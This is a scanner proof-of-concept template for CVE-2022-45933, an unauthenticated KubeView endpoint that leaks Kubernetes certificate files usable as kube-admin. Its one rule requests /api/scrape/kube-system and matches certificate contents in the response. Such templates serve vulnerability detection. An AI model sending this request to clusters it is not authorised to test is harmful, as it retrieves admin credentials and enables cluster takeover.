id: CVE-2022-45933

info:
  name: KubeView 未授权访问漏洞
  author: Lay0us1
  severity: medium
  verified: true
  description: KubeView 0.1.31之前的版本存在安全漏洞，该漏洞源于其api/ scraper /kube-system不需要身份验证，并检索可以作为kube-admin进行身份验证的证书文件允许攻击者获得Kubernetes集群的控制权。
  reference:
    - https://mp.weixin.qq.com/s/uAb1L0o8ApNS44bvnlOeGQ

rules:
    r0:
        request:
            method: GET
            path: /api/scrape/kube-system
        expression: |
            response.status == 200 && response.body.bcontains(b'BEGIN CERTIFICATE') && response.body.bcontains(b'END CERTIFICATE') && response.body.bcontains(b'kubernetes.io')
expression: r0()